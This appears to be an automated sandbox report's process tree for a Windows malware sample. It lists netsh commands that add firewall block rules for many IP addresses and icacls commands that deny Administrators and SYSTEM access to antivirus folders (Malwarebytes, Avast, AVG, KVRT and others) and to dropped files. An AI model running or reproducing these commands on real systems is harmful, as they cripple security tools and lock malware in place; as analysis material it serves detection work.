C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.1134⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.1135⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.1134⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.1135⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.724⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.725⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.724⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.725⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.964⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.965⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.964⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.965⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.814⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.815⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.814⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.815⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.224⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.225⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.224⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.225⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.1864⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.1865⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.1864⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.1865⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.1694⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.1695⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.1694⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.1695⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.114⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.115⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.114⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.115⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.2364⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.2365⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.2364⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.2365⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.614⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.615⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.614⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.615⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.1024⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.1025⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.1024⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.1025⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.1514⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.1515⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.1514⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.1515⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.264⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.265⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.264⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.265⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.2304⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.2305⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.2304⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.2305⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\java.exe /deny Администраторы:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\java.exe /deny System:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny система:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\java.exe /deny система:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\windows\svchost.exe /deny Администраторы:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\windows\svchost.exe /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny система:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\windows\svchost.exe /deny система:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass.exe /deny Администраторы:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass.exe /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\kz.exe /deny Администраторы:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\kz.exe /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\script.exe /deny Администраторы:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\script.exe /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny Администраторы:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Администраторы:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\olly.exe /deny Администраторы:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\olly.exe /deny System:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass2.exe /deny Администраторы:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass2.exe /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\boy.exe /deny Администраторы:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\boy.exe /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
